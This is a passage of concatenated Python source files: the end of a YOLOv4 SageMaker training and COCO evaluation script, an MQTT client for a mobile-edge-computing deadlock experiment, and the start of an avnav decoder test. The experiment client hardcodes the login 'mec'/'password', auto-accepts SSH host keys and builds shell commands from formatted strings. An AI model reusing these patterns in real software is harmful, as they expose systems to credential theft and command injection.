# num_workers=config.workers, pin_memory=True, drop_last=True, collate_fn=collate)
if rank == 0:
val_loader = DataLoader(val_dataset, batch_size=config.batch // config.subdivisions, shuffle=True, num_workers=config.workers,
pin_memory=True, drop_last=True, collate_fn=val_collate)
writer = SummaryWriter(log_dir=config.TRAIN_TENSORBOARD_DIR,
filename_suffix=f'OPT_{config.TRAIN_OPTIMIZER}_LR_{config.learning_rate}_BS_{config.batch}_Sub_{config.subdivisions}_Size_{config.width}',
comment=f'OPT_{config.TRAIN_OPTIMIZER}_LR_{config.learning_rate}_BS_{config.batch}_Sub_{config.subdivisions}_Size_{config.width}')
config.max_batches = int(epochs* len(train_loader.dataset)/config.batch)
step0 = int(config.max_batches * 0.8)
step1 = int(config.max_batches * 0.9)
config.steps = [step0, step1]
config.policy = config.steps
max_itr = epochs * n_train
# global_step = config.TRAIN_MINEPOCH * n_train
global_step = 0
logging.info(f'''Starting training:
Epochs: {epochs}
Batch size: {config.batch}
Subdivisions: {config.subdivisions}
Learning rate: {config.learning_rate}
Training size: {n_train}
Validation size: {n_val}
Checkpoints: {save_cp}
Device: {device.type}
Images size: {config.width}
Optimizer: {config.TRAIN_OPTIMIZER}
Dataset classes: {config.classes}
Train label path:{config.train_label}
        Pretrained:      {config.pretrained}
''')
# learning rate setup
def burnin_schedule(i):
if i < config.burn_in:
factor = pow(i / config.burn_in, 4)
elif i < config.steps[0]:
factor = 1.0
elif i < config.steps[1]:
factor = 0.1
else:
factor = 0.01
return factor
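    # Worked example of burnin_schedule (numbers are illustrative): with
    # burn_in = 1000 and steps = [8000, 9000] the multiplier would be
    #   i = 500   -> (500 / 1000) ** 4 = 0.0625   (warm-up ramp)
    #   i = 4000  -> 1.0                          (full learning rate)
    #   i = 8500  -> 0.1                          (first decay)
    #   i = 9500  -> 0.01                         (second decay)
    # LambdaLR below multiplies the base lr (learning_rate / batch) by this factor.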
if config.TRAIN_OPTIMIZER.lower() == 'adam':
optimizer = optim.Adam(
model.parameters(),
lr=config.learning_rate / config.batch,
betas=(0.9, 0.999),
eps=1e-08,
)
elif config.TRAIN_OPTIMIZER.lower() == 'sgd':
optimizer = optim.SGD(
params=model.parameters(),
lr=config.learning_rate / config.batch,
momentum=config.momentum,
weight_decay=config.decay,
        )
    else:
        raise ValueError(f'unsupported TRAIN_OPTIMIZER: {config.TRAIN_OPTIMIZER}')
scheduler = optim.lr_scheduler.LambdaLR(optimizer, burnin_schedule)
criterion = Yolo_loss(device=device, batch=config.batch // config.subdivisions, n_classes=config.classes)
# scheduler = ReduceLROnPlateau(optimizer, mode='max', verbose=True, patience=6, min_lr=1e-7)
# scheduler = CosineAnnealingWarmRestarts(optimizer, 0.001, 1e-6, 20)
save_prefix = 'Yolov4_epoch'
saved_models = deque()
model.train()
for epoch in range(epochs):
epoch_loss = 0
epoch_step = 0
with tqdm(total=n_train, desc=f'Epoch {epoch + 1}/{epochs}', unit='img', ncols=50) as pbar:
for i, batch in enumerate(train_loader):
global_step += 1
epoch_step += 1
images = batch[0]
bboxes = batch[1]
images = images.to(device=device, dtype=torch.float32)
bboxes = bboxes.to(device=device)
bboxes_pred = model(images)
loss, loss_xy, loss_wh, loss_obj, loss_cls, loss_l2 = criterion(bboxes_pred, bboxes)
# loss = loss / config.subdivisions
loss.backward()
epoch_loss += loss.item()
if global_step % config.subdivisions == 0:
optimizer.step()
scheduler.step()
model.zero_grad()
if global_step % (log_step * config.subdivisions) == 0 and rank == 0:
writer.add_scalar('train/Loss', loss.item(), global_step)
writer.add_scalar('train/loss_xy', loss_xy.item(), global_step)
writer.add_scalar('train/loss_wh', loss_wh.item(), global_step)
writer.add_scalar('train/loss_obj', loss_obj.item(), global_step)
writer.add_scalar('train/loss_cls', loss_cls.item(), global_step)
writer.add_scalar('train/loss_l2', loss_l2.item(), global_step)
writer.add_scalar('lr', scheduler.get_lr()[0] * config.batch, global_step)
pbar.set_postfix(**{'loss (batch)': loss.item(), 'loss_xy': loss_xy.item(),
'loss_wh': loss_wh.item(),
'loss_obj': loss_obj.item(),
'loss_cls': loss_cls.item(),
'loss_l2': loss_l2.item(),
'lr': scheduler.get_lr()[0] * config.batch
})
logging.info('Train step_{}: loss : {},loss xy : {},loss wh : {},'
'loss obj : {},loss cls : {},loss l2 : {},lr : {}'
.format(global_step, loss.item(), loss_xy.item(),
loss_wh.item(), loss_obj.item(),
loss_cls.item(), loss_l2.item(),
scheduler.get_lr()[0] * config.batch))
pbar.update(images.shape[0])
# Use a barrier() to make sure that process 1 loads the model after process
# 0 saves it.
#dist.barrier()
if rank == 0:
logging.info(f'epoch loss : {epoch_loss/epoch_step},')
if config.use_darknet_cfg:
eval_model = Darknet(config.cfgfile, inference=True)
else:
eval_model = Yolov4(config.pretrained, n_classes=config.classes, inference=True)
eval_model.load_state_dict(model.module.state_dict())
eval_model.to(device)
evaluator = evaluate(eval_model, val_loader, config, device)
del eval_model
stats = evaluator.coco_eval['bbox'].stats
writer.add_scalar('train/AP', stats[0], global_step)
writer.add_scalar('train/AP50', stats[1], global_step)
writer.add_scalar('train/AP75', stats[2], global_step)
writer.add_scalar('train/AP_small', stats[3], global_step)
writer.add_scalar('train/AP_medium', stats[4], global_step)
writer.add_scalar('train/AP_large', stats[5], global_step)
writer.add_scalar('train/AR1', stats[6], global_step)
writer.add_scalar('train/AR10', stats[7], global_step)
writer.add_scalar('train/AR100', stats[8], global_step)
writer.add_scalar('train/AR_small', stats[9], global_step)
writer.add_scalar('train/AR_medium', stats[10], global_step)
writer.add_scalar('train/AR_large', stats[11], global_step)
if save_cp and rank == 0:
try:
# os.mkdir(config.checkpoints)
os.makedirs(config.checkpoints, exist_ok=True)
logging.info('Created checkpoint directory')
except OSError:
pass
save_path = os.path.join(config.checkpoints, f'{save_prefix}{epoch + 1}.pth')
            # save the underlying model's weights (without the DDP 'module.' prefix)
            torch.save(model.module.state_dict(), save_path)
logging.info(f'Checkpoint {epoch + 1} saved !')
saved_models.append(save_path)
if len(saved_models) > config.keep_checkpoint_max > 0:
model_to_remove = saved_models.popleft()
try:
os.remove(model_to_remove)
                except OSError:
                    logging.info(f'failed to remove {model_to_remove}')
if rank == 0:
writer.close()
logging.info(f'Train exit!')
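# Checkpoints taken from a DistributedDataParallel wrapper carry a 'module.'
# prefix on every key, while checkpoints taken from model.module do not. A
# small illustrative loader that tolerates both layouts (the helper name and
# the strict=False choice are assumptions, not part of the original script):
def _load_checkpoint_sketch(model, path, map_location='cpu'):
    state = torch.load(path, map_location=map_location)
    # strip a leading 'module.' so plain (non-DDP) models can load DDP checkpoints
    state = {(k[len('module.'):] if k.startswith('module.') else k): v
             for k, v in state.items()}
    model.load_state_dict(state, strict=False)
    return model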
@torch.no_grad()
def evaluate(model, data_loader, cfg, device, logger=None, **kwargs):
""" finished, tested
"""
# cpu_device = torch.device("cpu")
model.eval()
# header = 'Test:'
coco = convert_to_coco_api(data_loader.dataset, bbox_fmt='coco')
coco_evaluator = CocoEvaluator(coco, iou_types = ["bbox"], bbox_fmt='coco')
for images, targets in data_loader:
model_input = [[cv2.resize(img, (cfg.w, cfg.h))] for img in images]
model_input = np.concatenate(model_input, axis=0)
model_input = model_input.transpose(0, 3, 1, 2)
model_input = torch.from_numpy(model_input).div(255.0)
model_input = model_input.to(device)
targets = [{k: v.to(device) for k, v in t.items()} for t in targets]
if torch.cuda.is_available():
torch.cuda.synchronize()
model_time = time.time()
outputs = model(model_input)
# outputs = [{k: v.to(cpu_device) for k, v in t.items()} for t in outputs]
model_time = time.time() - model_time
# outputs = outputs.cpu().detach().numpy()
res = {}
# for img, target, output in zip(images, targets, outputs):
for img, target, boxes, confs in zip(images, targets, outputs[0], outputs[1]):
img_height, img_width = img.shape[:2]
# boxes = output[...,:4].copy() # output boxes in yolo format
boxes = boxes.squeeze(2).cpu().detach().numpy()
boxes[...,2:] = boxes[...,2:] - boxes[...,:2] # Transform [x1, y1, x2, y2] to [x1, y1, w, h]
boxes[...,0] = boxes[...,0]*img_width
boxes[...,1] = boxes[...,1]*img_height
boxes[...,2] = boxes[...,2]*img_width
boxes[...,3] = boxes[...,3]*img_height
boxes = torch.as_tensor(boxes, dtype=torch.float32)
# confs = output[...,4:].copy()
confs = confs.cpu().detach().numpy()
labels = np.argmax(confs, axis=1).flatten()
labels = torch.as_tensor(labels, dtype=torch.int64)
scores = np.max(confs, axis=1).flatten()
scores = torch.as_tensor(scores, dtype=torch.float32)
res[target["image_id"].item()] = {
"boxes": boxes,
"scores": scores,
"labels": labels,
}
evaluator_time = time.time()
coco_evaluator.update(res)
evaluator_time = time.time() - evaluator_time
# gather the stats from all processes
coco_evaluator.synchronize_between_processes()
# accumulate predictions from all images
coco_evaluator.accumulate()
coco_evaluator.summarize()
return coco_evaluator
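# evaluate() above rescales normalised corner boxes to pixel-space COCO boxes
# ([x1, y1, x2, y2] in 0..1 -> [x1, y1, w, h] in pixels). The same transform
# as a standalone helper (illustrative only):
def _yolo_to_coco_boxes_sketch(boxes_norm, img_width, img_height):
    boxes = np.asarray(boxes_norm, dtype=np.float32).copy()
    boxes[..., 2:] -= boxes[..., :2]   # corners -> width/height
    boxes[..., 0] *= img_width
    boxes[..., 1] *= img_height
    boxes[..., 2] *= img_width
    boxes[..., 3] *= img_height
    return boxes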
def get_args(**kwargs):
cfg = kwargs
parser = argparse.ArgumentParser(description='Train the Model on images and target masks',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# parser.add_argument('-b', '--batch-size', metavar='B', type=int, nargs='?', default=2,
# help='Batch size', dest='batchsize')
parser.add_argument('-l', '--learning_rate', metavar='LR', type=float, nargs='?', default=0.001,
help='Learning rate', dest='learning_rate')
parser.add_argument('-f', '--load', dest='load', type=str, default=None,
help='Load model from a .pth file')
parser.add_argument('-g', '--gpu', metavar='G', type=int, default=os.environ['SM_NUM_GPUS'],
help='GPU', dest='gpu')
parser.add_argument('-d', '--data_dir', type=str, default='/opt/ml/input/data/data_dir/',
help='dataset dir', dest='dataset_dir')
parser.add_argument('-p', '--pretrained',type=str, default='/opt/ml/input/data/pretrained/yolov4.conv.137.pth', help='pretrained yolov4.conv.137')
parser.add_argument('-c', '--classes',type=int, default=3, help='dataset classes')
parser.add_argument('-t', '--train_txt',dest='train_label', type=str, default='/opt/ml/input/data/train_txt/train.txt', help="train label path")
parser.add_argument('-v', '--val_txt',dest='val_label', type=str, default='/opt/ml/input/data/val_txt/val.txt', help="val label path")
parser.add_argument('-e', '--epochs',dest='epochs', type=int, default=1, help="epoch number")
parser.add_argument('-b', '--batch',dest='batch', type=int, default=32, help="batch number")
parser.add_argument('-w', '--workers',dest='workers', type=int, default=2, help="workers number")
parser.add_argument('-s', '--subdivisions',dest='subdivisions', type=int, default=16, help="subdivisions number")
parser.add_argument('-o', '--optimizer',type=str, default='adam',
help='training optimizer',
dest='TRAIN_OPTIMIZER')
parser.add_argument('-i', '--iou_type', type=str, default='iou',
help='iou type (iou, giou, diou, ciou)',
dest='iou_type')
parser.add_argument(
'-keep-checkpoint-max', type=int, default=10,
help='maximum number of checkpoints to keep. If set 0, all checkpoints will be kept',
dest='keep_checkpoint_max')
args = vars(parser.parse_args())
# for k in args.keys():
# cfg[k] = args.get(k)
cfg.update(args)
return edict(cfg)
def init_logger(log_file=None, log_dir=None, log_level=logging.DEBUG, mode='w', stdout=True):
"""
log_dir: 日志文件的文件夹路径
mode: 'a', append; 'w', 覆盖原文件写入.
"""
def get_date_str():
now = datetime.datetime.now()
return now.strftime('%Y-%m-%d_%H-%M-%S')
fmt = '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s: %(message)s'
if log_dir is None:
log_dir = '~/temp/log/'
if log_file is None:
log_file = 'log_' + get_date_str() + '.txt'
if not os.path.exists(log_dir):
os.makedirs(log_dir)
log_file = os.path.join(log_dir, log_file)
    # logging is not configured yet at this point, so print is used for output
print('log file path:' + log_file)
logging.basicConfig(level=logging.DEBUG,format=fmt,filename=log_file,filemode=mode)
#logging.basicConfig(level=logging.DEBUG,format=fmt)
if stdout:
console = logging.StreamHandler(stream=sys.stdout)
console.setLevel(log_level)
formatter = logging.Formatter(fmt)
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
return logging
def _get_date_str():
now = datetime.datetime.now()
return now.strftime('%Y-%m-%d_%H-%M')
log_dir = os.environ['SM_OUTPUT_DATA_DIR']
logging = init_logger(log_dir=log_dir)
if __name__ == "__main__":
cfg = get_args(**Cfg)
world_size = len(json.loads(os.environ['SM_HOSTS'])) * cfg.gpu
#processes = []
try:
if world_size > 1:
mp.spawn(train, nprocs=cfg.gpu, args=(cfg,), join=True, daemon=False)
else:
train(0, cfg)
'''
for local_rank in range(cfg.gpu):
p = mp.Process(target=train, args=(local_rank, cfg))
p.start()
processes.append(p)
for p in processes:
p.join()
'''
except Exception as e:
print(e)
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
1gui_user.py
|
#!/usr/bin/env python3
import matplotlib
matplotlib.use('TkAgg')
import socket
import os
import ast
import struct
from threading import Thread
import random as r
import time
import datetime as dt
import subprocess as sp
import paho.mqtt.client as mqtt
import matplotlib.pyplot as plt
from drawnow import *
import smtplib
import config
import paramiko
import data_file as dst
port = 65000 # The port used by the server
# hosts = {} # {hostname: ip}
multicast_group = '224.3.29.71'
server_address = ('', 10000)
record = []  # [({tasks}, {waiting time}), hostname] records each task list sent, its waiting times, and the host it was sent to
# Create the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock.bind(server_address)
# Tell the operating system to add the socket to the multi-cast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
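# _need and allocation above are shaped for the Banker's-algorithm experiments
# referenced by the 'rms+bankers' / 'edf+bankers' entries in `filename`. The
# safety check itself runs on the MEC side; a classic textbook version is
# sketched here for reference only, with `available` as an assumed vector of
# free resources per type.
def _bankers_safety_check_sketch(available, need, allocation):
    work = list(available)
    finish = {t: False for t in need}
    progressed = True
    while progressed:
        progressed = False
        for t in need:
            if not finish[t] and all(n <= w for n, w in zip(need[t], work)):
                # task t can run to completion; release its allocation back to the pool
                work = [w + a for w, a in zip(work, allocation[t])]
                finish[t] = True
                progressed = True
    return all(finish.values())   # True -> a safe execution order exists
# e.g. _bankers_safety_check_sketch([3, 3, 2], _need, allocation) -> True
# (assuming that free-resource vector).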
'''
ax.annotate('local max', xy=(2, 1), xytext=(3, 1.5),
arrowprops=dict(facecolor='black', shrink=0.05),
)
'''
thread_record = []
task_record = {} # records tasks start time and finish time {seq_no:{task:[duration, start_time,finish_time]}}
# idea for task naming # client-id_task-no_task-id client id = 11, task no=> sequence no, task id => t1
tasks_executed_on_time = 0
tasks_not_executed_on_time = 0
timely_ = {'local':0, 'mec':0, 'cloud':0}
untimely_ = {'local':0, 'mec':0, 'cloud':0}
filename = {2: 'rms+bankers',
3: 'edf+bankers',
7: 'rms+wound_wait',
10: 'rms+wait_die',
12: 'edf+wound_wait',
16: 'edf+wait_die'}
plt.ion()
fig = plt.figure(frameon=True)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(223)
ax3 = fig.add_subplot(224)
def auto_value(no):
if no < 5:
return no
elif no < 10:
return no - 3
elif no < 50:
return no - 6
elif no < 150:
return no - 30
elif no < 800:
return no - 70
elif no < 2000:
return no - 200
else:
return no - 400
def plot_performance():
name = ['Timely', 'Untimely']
ypos = ([0, 1])
total = tasks_executed_on_time + tasks_not_executed_on_time
if tasks_executed_on_time > 0:
timely = round((tasks_executed_on_time / total) * 100, 2)
else:
timely = 0
if tasks_not_executed_on_time > 0:
untimely = round((tasks_not_executed_on_time / total) * 100, 2)
else:
untimely = 0
values = [tasks_executed_on_time, tasks_not_executed_on_time]
ax1.set_xticks(ypos)
ax1.set_xticklabels(name)
ax1.bar(ypos, values, align='center', color=['g', 'm'], alpha=0.5)
ax1.set_title('Task execution Time record')
    dis = 'Seq: {}\nTasks completed: {}\nTotal split tasks: {}'.format(seq, total, total_split_task)
# ax1.annotate(dis, xy=(2, 1), xytext=(3, 1.5))
ax1.text(1, auto_value(tasks_executed_on_time), dis, size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.7, 0.7), fc=(1., 0.8, 0.8), ))
ax1.text(-0.1, tasks_executed_on_time, '{}, {}%'.format(tasks_executed_on_time, timely), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
ax1.text(0.99, tasks_not_executed_on_time, '{}, {}%'.format(tasks_not_executed_on_time, untimely),
size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
plt.subplot(ax1)
d = [[timely_, ax2, 'Timely Details'], [untimely_, ax3, 'UnTimely Details']]
for info in d:
plot_details(ax=info[1], data=info[0], title=info[2])
fig.suptitle('MEC Performance During Deadlock Experiment')
def plot_details(ax, data, title):
name = ['Local', 'MEC', 'Cloud']
ypos = ([0, 1, 2])
data_per = {}
total = 0
for i in data:
total += data[i]
for i in data:
if data[i] == 0:
data_per[i] = 0
else:
data_per[i] = round((data[i] / total) * 100, 2)
values = list(data.values())
ax.set_xticks(ypos)
ax.set_xticklabels(name)
ax.bar(ypos, values, align='center', color=['g', 'b', 'r'], alpha=0.5)
ax.set_title(title)
g = -0.1
for i in data:
ax.text(g, data[i], '{}, {}%'.format(data[i], data_per[i]), size=10, rotation=0,
ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), ))
g += 1
plt.subplot(ax)
def get_time():
_time_ = dt.datetime.utcnow()
return _time_
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
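# gosh_dist is a cheap pseudo-random index generator: the nested modulo of a
# large power keeps the result in [0, _range). For example, gosh_dist(3)
# always yields 0, 1 or 2 and can be used to pick one of three hosts.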
# Callback Function on Connection with MQTT Server
def on_connect(connect_client, userdata, flags, rc):
print("Connected with Code :" + str(rc))
# Subscribe Topic from here
connect_client.subscribe(topic, qos=0)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global hosts
global host_dict
global algo_id
global ho
# print the message received from the subscribed topic
details = str(msg.payload, 'utf-8')[2:].split('_')
ho = ast.literal_eval(details[0]) # {hostname: ip}
algo_id = int(details[1])
hosts = sorted(list(ho.values())) # list of Ips
host_dict = dict(zip(list(ho.values()), list(ho.keys()))) # {ip: hostname}
# print('hosts: ', hosts)
_client.loop_stop()
def get_mec_details():
global topic
global _client
global broker_ip
username = 'mec'
password = 'password'
broker_ip = input("Broker's IP: ").strip()
broker_port_no = 1883
topic = 'mec'
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
def on_connect_task(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(task_topic, qos=0)
u_time = {'local': [], 'mec': [], 'cloud': []}
t_time = {'local': [], 'mec': [], 'cloud': []}
# Callback Function on Receiving the Subscribed Topic/Message
def on_receive_task(message_client, userdata, msg):
global tasks_executed_on_time
global tasks_not_executed_on_time
# print the message received from the subscribed topic
data = str(msg.payload, 'utf-8')
received_task = ast.literal_eval(data) # {task_id: ['2020', '04', '09', '14', '38', '39', '627060', '<mec>']}
for i in received_task:
tk = '.'.join(i.split('.')[:4])
# print('tk: {}'.format(tk))
seq_no = int(tk.split('.')[3]) # naming tasks = task_id.node_id.client_id.sequence_no =>t2.110.170.10
k = task_record[seq_no][tk] # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
if len(k) < 3: # check if i have received a task with the same id
a = received_task[i]
k.append(dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6])))
p = k[2] - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds * (10 ** -6))
elif len(k) == 3:
a = received_task[i]
t = dt.datetime(int(a[0]), int(a[1]),
int(a[2]), int(a[3]),
int(a[4]), int(a[5]),
int(a[6]))
p = t - k[1]
if p < k[0]:
tasks_executed_on_time += 1
timely_[a[7]] += 1
t_time[a[7]].append(p.seconds + p.microseconds*(10**-6))
else:
tasks_not_executed_on_time += 1
untimely_[a[7]] += 1
u_time[a[7]].append(p.seconds + p.microseconds*(10**-6))
def receive_mec_start():
global task_topic
global task_client
username = 'mec'
password = 'password'
broker_port_no = 1883
task_topic = client_id(ip_address())
task_client = mqtt.Client()
task_client.on_connect = on_connect_task
task_client.on_message = on_receive_task
task_client.username_pw_set(username, password)
task_client.connect(broker_ip, broker_port_no, 60)
task_client.loop_forever()
def ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def send_email(msg):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results {} {}'.format(filename[algo_id], get_hostname())
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
        records = data if isinstance(data, (list, tuple)) else [data]
        for line in records:
            cmd = 'echo "{}" >> /home/mec/result/client_data.py'.format(line)  # append each record to the result file on the host
            stdin, stdout, stderr = c.exec_command(cmd)
c.close()
except Exception as e:
print(e)
def client_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
total_task_sent = 0
total_split_task = 0
task_dist = {1: 0, 2: 0, 3: 0}
def task_details(tasks):
global task_dist, total_task_sent, total_split_task
total_task_sent += len(tasks)
for task in tasks:
total_split_task += tasks[task]['wcet']
task_dist[tasks[task]['wcet']] += 1
def name_task(task_list, node_id, seq_no):
# naming nomenclature of tasks = task_id.node_id.client_id.sequence_no =>t2.110.170.10
# returns task list and waiting_time with proper identification
return {i + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[0][i] for i in task_list[0]}, \
{k + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[1][k] for k in task_list[1]}
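# Task names built above follow task_id.node_id.client_id.sequence_no, e.g.
# 't2.110.170.10'. A small illustrative parser for that format (the helper
# name is not part of the original script):
def _parse_task_name_sketch(name):
    task_id, node_id, client, seq_no = name.split('.')
    return {'task_id': task_id, 'node_id': node_id,
            'client_id': client, 'seq_no': int(seq_no)}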
def namestr(obj):
namespace = globals()
return [name for name in namespace if namespace[name] is obj]
def split_list(data, _id_):
if _id_ == 4: # 866
return data[:866]
if _id_ == 5: # 867
return data[866:1733]
if _id_ == 6: # 867
return data[1733:]
def save_data():
result = f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} " \
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}" \
f"\nrecord{len(hosts)} = {record} \nhost_names{len(hosts)} = {host_dict}" \
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}" \
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = " \
f"{total_split_task} " \
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n" \
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}" \
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}" \
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}" \
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
list_result = [
f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} ",
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}",
f"\nrecord{len(hosts)} = {record} ",
f"\nhost_names{len(hosts)} = {host_dict}",
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}"
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = "
f"{total_split_task} "
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n",
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}",
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}",
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}",
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
else:
        os.makedirs(path_)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
file_ = open(f'{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py'
os.system(cmd)
file_.write(i)
file_.close()
sp.run(
["scp", f"{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py",
f"mec@{ho['osboxes-0']}:/home/mec/result/python"])
sp.run(
["scp", f"{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py",
f"mec@{ho['osboxes-0']}:/home/mec/result/linux"])
# send_result(ho['osboxes-0'], result)
send_email(result)
def main():
global record
global client_id_
global seq
os.system('clear')
print("================== Welcome to Client Platform ===================")
get_mec_details()
client_id_ = client_id(ip_address())
'''
thread_record.append(Thread(target=receive_tasks))
thread_record[-1].daemon = True
thread_record[-1].start()
'''
redeem_task = Thread(target=receive_mec_start)
redeem_task.daemon = True
redeem_task.start()
while True:
time.sleep(1)
if len(hosts) > 0:
break
print('Client is connected to servers: {}'.format(hosts))
data = {4: dst.mec4, 7: dst.mec7, 10: dst.mec10}
task_bank = {4: dst.data_list4, 5: dst.data_list5, 6: dst.data_list6}
cmd = ['hostname']
host_id = str(sp.check_output(cmd, shell=True), 'utf-8')[-2]
t_list = task_bank[int(host_id)]
while True:
try:
x = input('Enter "y" to start and "stop" to exit: ').strip().lower()
_data_ = split_list(data[len(hosts)], int(host_id))
if x == 'y':
for i in range(len(_data_)):
seq = i
                    rand_host = hosts[int(_data_[i]) - 1]  # host selection using the generated gaussian-like distribution
_task_ = t_list[i] # tasks, waiting time
_tasks_list = name_task(_task_, client_id(rand_host), i) # id's tasks => ({tasks}, {waiting time})
task_details(_tasks_list[0])
record.append([_tasks_list, host_dict[rand_host]])
for task in _tasks_list[0]:
sec = dt.timedelta(seconds=_task_[1][task[:2]][1])
if i not in task_record: # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
task_record[i] = {task: [sec, get_time()]}
else:
task_record[i][task] = [sec, get_time()]
# client(_tasks_list, rand_host)
task_client.publish(client_id(rand_host), "t {}".format(_tasks_list))
print("Sent {} to {} node_id {} \n\n".format(_tasks_list, rand_host, client_id(rand_host)))
drawnow(plot_performance)
time.sleep(3)
elif x == 'stop':
print('\nProgramme terminated')
print('MEC: ', ho['osboxes-0'])
save_data()
task_client.loop_stop()
print('done')
time.sleep(1)
break
except KeyboardInterrupt:
print('\nProgramme terminated')
task_client.loop_stop()
break
if __name__ == "__main__":
main()
|
test_decoder.py
|
import os
import threading
import time
import inspect
import sys
import traceback
from avnav_util import AVNUtil
from avnav_api import AVNApi
allData={}
class ApiImpl(AVNApi):
def __init__(self):
self.patterns = None # type: dict
self.prefix=''
def log(self, str, *args):
print("###LOG### %s%s" % (self.prefix,str % args))
def error(self, str, *args):
print("###ERROR# %s%s" % (self.prefix,str % args))
